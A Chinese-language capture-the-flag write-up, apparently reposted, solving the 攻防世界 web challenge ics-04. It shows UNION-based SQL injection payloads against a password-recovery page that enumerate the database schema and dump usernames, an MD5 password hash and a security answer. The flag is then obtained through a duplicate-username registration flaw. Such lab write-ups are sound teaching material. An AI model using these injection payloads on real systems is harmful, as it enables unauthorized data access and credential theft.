攻防世界-web-ics-04-从0到1的解题历程writeup
生活随笔
收集整理的這篇文章主要介紹了
攻防世界-web-ics-04-从0到1的解题历程writeup
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
題目分析
題目描述:工控云管理系統新添加的登錄和注冊頁面存在漏洞,請找出flag。
嘗試發現該靶機環境的主要功能為登陸、注冊、找回密碼,題目描述也是很直接,漏洞點就在這。
遇事不決先掃描一下網站有沒有漏洞
發現在findpwd.php中存在sql注入漏洞
嘗試聯合查詢
-1' union select 1,2,3,4--? -1' union select 1,2,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata),4--?得到數據庫cetc004
-1' union select 1,2,(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE TABLE_SCHEMA="cetc004" ),4--?得到表名:user
-1' union select 1,2,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'user'),4--?得到字段:username,password,question,answer
-1' union select 1,2,(SELECT GROUP_CONCAT(username) FROM cetc004.user),4--?得到username為:c3tlwDmIn23
password:2f8667f381ff50ced6a3edc259260ba9
question:cetc
answer:cdwcewf2e3235y7687jnhbvdfcqsx12324r45y687o98kynbgfvds
可以發現password被MD5加密了(因為我嘗試注冊了一個賬號,發現數據庫中存放的密碼就是md5后的結果)
于是嘗試在找回密碼界面修改c3tlwDmIn23的密碼,發現需要輸入原密碼。明顯findpwd.php也不是我們能攻擊的點。
用自己注冊的賬號進行修改密碼發現會跳轉到reset.php
抓包后也沒有發現什么可攻擊的點。最后神奇的我試了一下注冊相同的用戶名。。。。。居然沒有查重直接注冊了一個用戶名為c3tlwDmIn23的賬號。。。登陸獲得flag
總結
以上是生活随笔為你收集整理的攻防世界-web-ics-04-从0到1的解题历程writeup的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 攻防世界-web-FlatScience
- 下一篇: 攻防世界-web-bug-从0到1的解题